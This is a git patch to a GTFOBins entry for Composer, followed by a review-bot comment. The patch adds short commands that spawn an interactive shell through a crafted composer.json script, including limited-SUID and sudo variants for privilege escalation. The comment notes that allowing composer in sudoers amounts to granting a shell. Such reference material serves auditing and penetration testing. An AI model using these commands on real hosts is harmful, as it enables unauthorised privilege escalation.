From 03c30e9944ec9023befaf8cf8a7dde4d51e5fc8a Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 8 Nov 2020 10:33:56 +0100
Subject: [PATCH] Update composer

- align to the GTFOBins conventions
- avoid Python
- use limited SUID instead of just SUID
---
_gtfobins/composer.md | 29 ++++++++++++-----------------
1 file changed, 12 insertions(+), 17 deletions(-)

diff --git a/_gtfobins/composer.md b/_gtfobins/composer.md
index 70d66a0..2b8cb66 100644
--- a/_gtfobins/composer.md
+++ b/_gtfobins/composer.md
@@ -1,23 +1,18 @@
 ---
 functions:
- suid:
+ shell:
 - code: |
- cat << EOF > composer.json
- {
- "scripts": {
- "command": "python3 -c 'import pty;pty.spawn(\"bash\")'"
- }
- }
- EOF
- ./composer run-script command
+ TF=$(mktemp -d)
+ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
+ composer --working-dir=$TF run-script x
+ limited-suid:
+ - code: |
+ TF=$(mktemp -d)
+ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
+ ./composer --working-dir=$TF run-script x
 sudo:
 - code: |
- cat << EOF > composer.json
- {
- "scripts": {
- "command": "python3 -c 'import pty;pty.spawn(\"bash\")'"
- }
- }
- EOF
- composer run-script command
+ TF=$(mktemp -d)
+ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
+ sudo composer --working-dir=$TF run-script x
 ---
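Review bot: The `0<&3 1>&3 2>&3` redirection in all three new snippets (`shell`, `limited-suid`, `sudo`) is unexplained, and the entry has no `description:` field saying why the script's standard streams have to be re-attached from descriptor 3. Presumably Composer runs scripts with piped stdio while fd 3 still refers to the terminal, but the patch does not show that and it may differ between Composer versions, so the author should confirm it and state it, e.g. `description: Composer runs scripts with piped standard streams; the shell is re-attached to the terminal through file descriptor 3.` For readers auditing a host, the description could also say that `run-script` executes whatever the `composer.json` found in `--working-dir` defines, so a sudoers rule that allows `composer` with arbitrary arguments is equivalent to allowing a shell.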